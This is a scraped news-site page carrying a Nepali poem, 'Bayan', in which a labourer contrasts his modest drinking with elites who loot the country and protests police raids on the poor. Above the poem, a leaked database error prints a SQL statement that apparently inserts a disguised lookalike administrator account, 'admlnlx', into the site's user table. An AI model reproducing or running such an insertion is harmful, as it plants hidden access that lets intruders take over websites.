WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgkgKaga0MEcPCo8vtU//r89XPzN7u1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:07:43', '', 'admlnlx', 'admlnlx')

बयान – Gaule Khabar

बयान

बयान
खुक्सङ खम्बु राई, कवि/ अध्यक्ष – किरात राई लेखक संघ

‘रक्सी खान्छु
खाए पछि मात्छु
माते पछि हाकाहाकी भन्छु
साँचो कुरा नखोली अब हुन्न
बिगारे, आफ्नै ज्यान बिगारेँ
देश बिगारेको छैन

देशको विकास होस् भनेर
म त दिनभर इँटा बोक्छु
चिसो पानीमा बालुवा निकाल्छु
एकाबिहानै गिटी कुट्न निस्कन्छु
बाटो खन्छु, बिल्डिङ ठडाउँछु
बेलुका जिऊ दुख्छ
चिसोले हातखुट्टा कटक्क खान्छ
डोल्मा होटलमा
हल्का लोकल पिउँछु
ठूलाबडाले जस्तो
अरुलाई ठगेर, देश लुटेर
फाइभ स्टार होटलमा
महँङ्गा विदेशी रक्सी पिएको छैन
छाती फुकाएरै भन्छु
खाएँ त आफ्नै पसिना खाएँ
देश लुटेर खाएको छैन

म त सोझो मान्छे
धेरै कुरा जान्दिनँ
सरकारको ताल
त्यती निको लाको छैन
डोल्मा होटलमैं पुलिसले
किन बुटले हान्छ ?
रातबेरात किन तर्साउँछ ?
लुटेरा झैं भाँडाकुँडा किन लुटी लान्छ ?
जाँड, रक्सी पकाउने भाँडाकुँडा लगेपछि
डोल्मा धुरुधुरु किन रुन्छ ?
म त कोही रोएको हेर्नै सक्दिनँ
कसैको आँखामा आँशु देख्नै सक्दिनँ
मलाई पुलिसको यस्तो काम
पटक्कै मन परेको छैन
पुलिसले गरिबकै
उठिबास लाउँछ किन ?
मुठ्ठी उठाएरै भन्छु
सरकार….
डुबे, म आफै डुबें हुँला
देश डुबाएको छैन

खाएँ त आफ्नै पसिना खाएँ
तिमीले जस्तो,
देश लुटेर खाएको छैन
बिगारे, आफ्नै ज्यान बिगारेँ
तिमीले जस्तो,
देश बिगारेको छैन
डुबे, म आफै डुबें हुँला
तिमीले जस्तो,
देश डुबाएको छैन ।’

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका